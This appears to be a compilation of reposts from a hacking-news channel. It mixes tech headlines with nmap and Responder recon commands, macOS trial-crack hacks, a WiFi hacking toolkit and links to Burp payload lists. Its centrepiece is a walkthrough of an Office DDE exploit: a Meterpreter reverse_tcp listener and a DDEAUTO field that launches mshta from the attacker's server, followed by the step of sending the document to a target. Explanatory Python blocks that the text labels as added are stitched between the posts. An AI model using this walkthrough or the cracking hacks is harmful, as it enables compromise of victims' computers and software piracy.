Forwarded from UNDERCODE NEWS
TSMC and other vendors will support PS5 production next year, which may surpass 18 million.
#Technologies
Recon nmap and Windows hacking commands :
# Commands :
# Enumerate subnet
nmap -sn 10.10.10.1/24
# Fast simple scan
nmap -sS 10.10.10.1/24
export IP=10.10.10.11
# Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
# Full complete slow scan with output
nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP
# Autorecon
python3 autorecon.py $IP
# Scan for UDP
nmap $IP -sU
unicornscan -mU -v -I $IP
# Connect to udp if one is open
nc -u $IP 48772
# Responder
responder -I eth0 -A
# Amass
amass enum $IP
# Generating nice scan report
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
# Simple port knocking
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 1.1.1.1; done
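An added example (mine, not from the post) that parses nmap's grepable -oG output in Python instead of the grep/cut pipeline above: it keeps every port per host and, unlike grep "/open", does not count the UDP state open|filtered as a confirmed exposure. The scan text is a constructed sample.

```python
import re
from collections import defaultdict

# Constructed sample of nmap grepable (-oG) output, not a real scan.
SAMPLE_OG = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 10.1.1.5 ()\tStatus: Up
Host: 10.1.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1/, 80/open/tcp//http//nginx/, 443/filtered/tcp//https///\tIgnored State: closed (997)
Host: 10.1.1.9 ()\tPorts: 139/filtered/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (998)
Host: 10.1.1.12 ()\tPorts: 161/open|filtered/udp//snmp///\tIgnored State: closed (999)
# Nmap done at (constructed sample)
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\t(.*)$")


def parse_grepable(text):
    """Return {ip: [(port, proto, state, service, version), ...]} from -oG text.
    Each Ports entry has seven '/'-separated fields:
    port/state/proto/owner/service/rpc info/version (nmap writes '|' for any
    '/' inside a version string, so splitting on '/' is safe)."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # comment and blank lines
        ip, _hostname, rest = m.groups()
        for field in rest.split("\t"):
            if not field.startswith("Ports: "):
                continue                  # "Status:" lines carry no ports
            for entry in field[len("Ports: "):].split(", "):
                parts = entry.split("/")
                if len(parts) < 7:
                    continue              # malformed entry, skip it
                port, state, proto, _owner, service, _rpc, version = parts[:7]
                hosts[ip].append((int(port), proto, state, service, version))
    return dict(hosts)


def exposed_hosts(text, confirmed_only=True):
    """IPs with at least one open port. With confirmed_only the UDP state
    'open|filtered' is not counted, whereas grep "/open" would match it."""
    states = {"open"} if confirmed_only else {"open", "open|filtered"}
    return sorted(ip for ip, ports in parse_grepable(text).items()
                  if any(p[2] in states for p in ports))


def open_ports(text):
    """{ip: [confirmed open ports]} for every host that had a Ports field."""
    return {ip: sorted(p[0] for p in ports if p[2] == "open")
            for ip, ports in parse_grepable(text).items()}


if __name__ == "__main__":
    print(exposed_hosts(SAMPLE_OG))       # ['10.1.1.5']
    print(open_ports(SAMPLE_OG))
```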
File enumeration :
Common :
# Check real file type
file file.xxx
# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars
# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract
# Check as binary file in hex
ghex file.xxx
# Check metadata
exiftool file.xxx
# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe
Disk files
# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory
Forwarded from UNDERCODE NEWS
A recent Apple patent confirms that future MacBooks could be fitted with view keyboards.
#Technologies
Forwarded from UNDERCODE NEWS
Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS) :
1) DDE stands for Dynamic Data Exchange; it allows data to be transferred between applications without any user interaction.
Hackers have used this technique to execute malicious scripts to compromise data.
This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.
This exploit does not require a macro feature to be enabled.
Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
We will have to import the Metasploit exploit.
Download it from GitHub using the terminal command:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
2) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.
3) use exploit/windows/dde_delivery, then set the server host with the following command
set SRVHOST 192.168.177.141
Next, set up the payload listener.
Do not use port 8080 for the listener, as the module's default server port is 8080.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit
4) Now copy and paste the code into any text document.
We used Office 365 ProPlus, fully updated.
Insert a field; a small error box appears in the document. Right-click it and choose Toggle Field Codes.
Paste the command into the document inside the field braces.
Save your document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.177.141:8080/mVg3YDU3gVQ"}
5) Send the document to the target and a Meterpreter session will open.
(don't copy our tips) ¯\_(ツ)_/¯
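Added example (mine, not from the post or the Metasploit module), from the defender's side: a scanner that flags fields whose instruction names DDE or DDEAUTO anywhere in a .docx, joining instrText runs because Word splits field code across runs. The sample document and its instruction string are constructed placeholders, not a working payload.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# A field whose instruction names DDE or DDEAUTO starts a DDE conversation.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def field_instructions(xml_bytes):
    """Yield the instruction text of every field in one WordprocessingML part.
    Complex fields are joined across runs (Word splits instrText freely, so
    matching run by run would miss them); simple fields keep it in w:instr."""
    depth, buf = 0, []
    for el in ET.fromstring(xml_bytes).iter():
        if el.tag == f"{{{W}}}fldSimple":
            yield el.get(f"{{{W}}}instr", "")
        elif el.tag == f"{{{W}}}fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:                 # outermost field closed
                    yield "".join(buf)
                    buf = []
        elif el.tag == f"{{{W}}}instrText" and depth > 0:
            buf.append(el.text or "")


def scan_docx(data):
    """Return [(part, instruction)] for DDE fields in any part under word/,
    so headers and footers are covered as well as document.xml."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for instr in field_instructions(z.read(name)):
                    if DDE_RE.search(instr):
                        hits.append((name, " ".join(instr.split())))
    return hits


def build_sample_docx(instruction):
    """Constructed minimal .docx (not a real Word file): the instruction is
    split mid-word across two body runs; the header holds a benign PAGE field."""
    doc = (f'<w:document xmlns:w="{W}"><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           f'<w:r><w:instrText>{instruction[:4]}</w:instrText></w:r>'
           f'<w:r><w:instrText>{instruction[4:]}</w:instrText></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
           '</w:p></w:body></w:document>')
    hdr = f'<w:hdr xmlns:w="{W}"><w:p><w:fldSimple w:instr=" PAGE "/></w:p></w:hdr>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", doc)
        z.writestr("word/header1.xml", hdr)
    return buf.getvalue()
```

Run scan_docx over a real file's bytes; the placeholder instruction used in the test below is split "DDEA" + "UTO ..." on purpose, which a per-run match would miss.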
MacOS Apps Hacks :
This hack doesn't work on systems with SIP (System Integrity Protection) enabled, and it's enabled by default since El Capitan. It can be easily disabled from Recovery Mode but it's another layer of security which is always good to have so disabling it permanently is not the wisest idea. I'll implement some solution to bypass this restriction when I have time.
» Things 3 Trial :
Bear bear-pro
Sketch sketch-trial
VPN Master vpn-master-vip
Installation & Run :
open a terminal and type :
1) git clone https://github.com/gebeto/macos-hacks
2) cd macos-hacks
3) cd <APPLICATION>
4) make
5) You can use run.sh, a wrapper script that sets the environment variables needed to inject the library and launches the application (it assumes the app is installed in /Applications; edit the script if yours differs).
enjoy :)
Forwarded from UNDERCODE NEWS
Foreign media: A separate promotional deal was signed by Google & Facebook, suspected of unfair price theft.
#International
Forwarded from UNDERCODE NEWS
Hedge funds show that Intel is considering a strategic sale, with the latter's share price rising by 5%.
#International
WiFi hack all in one for Termux :
Installation & Run :
$ git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod +x *
$ ./install.sh
$ sudo python wi-toolkit.py
or
$ sudo python2 wi-toolkit.py
Forwarded from UNDERCODE NEWS
After causing an 18-year-old Russian man to freeze to death, Google Maps announces improvements to navigation routes.
#Updates
A free real collection of Burpsuite Intruder payloads
> BurpBounty payloads, fuzz list
> malicious file uploads
> web pentesting methodologies and checklists.
Spiders, Robots and Crawlers IG-001
Search Engine Discovery/Reconnaissance IG-002
Identify application entry points IG-003
Testing for Web Application Fingerprint IG-004
Application Discovery IG-005
Analysis of Error Codes IG-006
SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM-001
DB Listener Testing - DB Listener weak CM-002
Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM-003
Application Configuration Management Testing - Application Configuration management weakness CM-004
Testing for File Extensions Handling - File extensions handling CM-005
Old, backup and unreferenced files - Old, backup and unreferenced files CM-006
Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM-007
Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM-008
Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
Testing for user enumeration - User enumeration AT-002
Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
Brute Force Testing - Credentials Brute forcing AT-004
Testing for bypassing authentication schema - Bypassing authentication schema AT-005
Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
Testing for Logout and Browser Cache Management - Logout function not properly implemented, browser cache weakness AT-007
Testing for CAPTCHA - Weak Captcha implementation AT-008
Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
Testing for Race Conditions - Race Conditions vulnerability AT-010
Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
Testing for Cookies attributes - Cookies are set not "HTTP Only", "Secure", and no time validity SM-002
Testing for Session Fixation - Session Fixation SM-003
Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
Testing for CSRF - CSRF SM-005
Testing for Path Traversal - Path Traversal AZ-001
Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
Testing for Privilege Escalation - Privilege Escalation AZ-003
Testing for Business Logic - Bypassable business logic BL-001
Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
Testing for Stored Cross Site Scripting - Stored XSS DV-002
Testing for DOM based Cross Site Scripting - DOM XSS DV-003
Testing for Cross Site Flashing - Cross Site Flashing DV-004
SQL Injection - SQL Injection DV-005
LDAP Injection - LDAP Injection DV-006
ORM Injection - ORM Injection DV-007
XML Injection - XML Injection DV-008
SSI Injection - SSI Injection DV-009
XPath Injection - XPath Injection DV-010
IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
Code Injection - Code Injection DV-012
OS Commanding - OS Commanding DV-013
Buffer overflow - Buffer overflow DV-014
Incubated vulnerability - Incubated vulnerability DV-015
Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
Locking Customer Accounts - Locking Customer Accounts DS-002
Testing for DoS Buffer Overflows - Buffer Overflows DS-003
User Specified Object Allocation - User Specified Object Allocation DS-004
User Input as a Loop Counter - User Input as a Loop Counter DS-005
Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
Failure to Release Resources - Failure to Release Resources DS-007
Storing too Much Data in Session - Storing too Much Data in Session DS-008
WS Information Gathering - N.A. WS-001
Testing WSDL - WSDL Weakness WS-002
FREE :
https://github.com/1N3/IntruderPayloads
Forwarded from UNDERCODE NEWS
Tinkov has explained why the deal to sell the bank to Yandex failed: he was underpaid by $200 million.
#International
Forwarded from UNDERCODE NEWS
A journalist used Zoom to get into a "secret" European meeting of defense ministers.
#International
Local DNS caching on any Linux :
1. apt-get install dnsmasq
2. configure
This configures dnsmasq in standalone mode, not as a plugin of NetworkManager.
vim /etc/dnsmasq.conf
+ resolv-file=/etc/???upstream-of-dnsmasq.conf
+ listen..
+ port
+ ...
vim /etc/???upstream-of-dnsmasq.conf
+ nameserver 8.8.8.8
+ nameserver 8.8.4.4
+ nameserver 2001:4860:4860::8888
vim /etc/resolv.conf
ONLY THESE TWO LINES
nameserver 127.0.0.1
nameserver ::1
3. service ... start OR systemctl ... start ..
HINT
What if dnsmasq fails to start?
/sbin/dnsmasq --test
then check the error message.
Ref: apach
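An added example (mine, not from the post) that lints the three files the procedure edits, checking what matters for a local cache: dnsmasq listens only on loopback, resolv-file points at a separate upstream list rather than back at /etc/resolv.conf, and /etc/resolv.conf itself names only 127.0.0.1 and ::1. The sample file contents and the upstream path /etc/upstream-of-dnsmasq.conf are constructed placeholders.

```python
import ipaddress

# Constructed sample files; the upstream path is a placeholder name.
GOOD_DNSMASQ = """\
# standalone dnsmasq: answer only on loopback, forward to the upstream list
resolv-file=/etc/upstream-of-dnsmasq.conf
listen-address=127.0.0.1
listen-address=::1
bind-interfaces
port=53
"""
UPSTREAM = "nameserver 8.8.8.8\nnameserver 8.8.4.4\nnameserver 2001:4860:4860::8888\n"
RESOLV = "nameserver 127.0.0.1\nnameserver ::1\n"


def parse_dnsmasq(text):
    """{option: [values]}; bare flags such as bind-interfaces map to [True]."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blanks
        if not line:
            continue
        key, sep, val = line.partition("=")
        opts.setdefault(key.strip(), []).append(val.strip() if sep else True)
    return opts


def nameservers(text):
    """Addresses from 'nameserver X' lines of a resolv.conf-style file."""
    return [l.split()[1] for l in text.splitlines()
            if l.strip().startswith("nameserver") and len(l.split()) > 1]


def check_local_cache(dnsmasq_text, resolv_text, upstream_text):
    """Lint the three files; an empty list means the cache listens only on
    loopback and forwards to a usable upstream that does not loop back."""
    findings = []
    opts = parse_dnsmasq(dnsmasq_text)
    listen = opts.get("listen-address", [])
    if not listen:
        findings.append("no listen-address: dnsmasq answers on every interface (open-resolver risk)")
    findings += [f"listen-address {a} is not loopback" for a in listen
                 if not ipaddress.ip_address(a).is_loopback]
    if "bind-interfaces" not in opts:
        findings.append("bind-interfaces missing: wildcard bind can clash with another local resolver")
    # dnsmasq falls back to /etc/resolv.conf, which here points at dnsmasq itself
    if opts.get("resolv-file", ["/etc/resolv.conf"])[0] == "/etc/resolv.conf":
        findings.append("resolv-file is /etc/resolv.conf: upstream would be dnsmasq itself")
    ups = nameservers(upstream_text)
    if not ups or any(ipaddress.ip_address(a).is_loopback for a in ups):
        findings.append("upstream list is empty or points back at loopback")
    local = nameservers(resolv_text)
    if not local or not all(ipaddress.ip_address(a).is_loopback for a in local):
        findings.append("/etc/resolv.conf must contain only 127.0.0.1 and ::1")
    return findings


if __name__ == "__main__":
    print(check_local_cache(GOOD_DNSMASQ, RESOLV, UPSTREAM))   # []
```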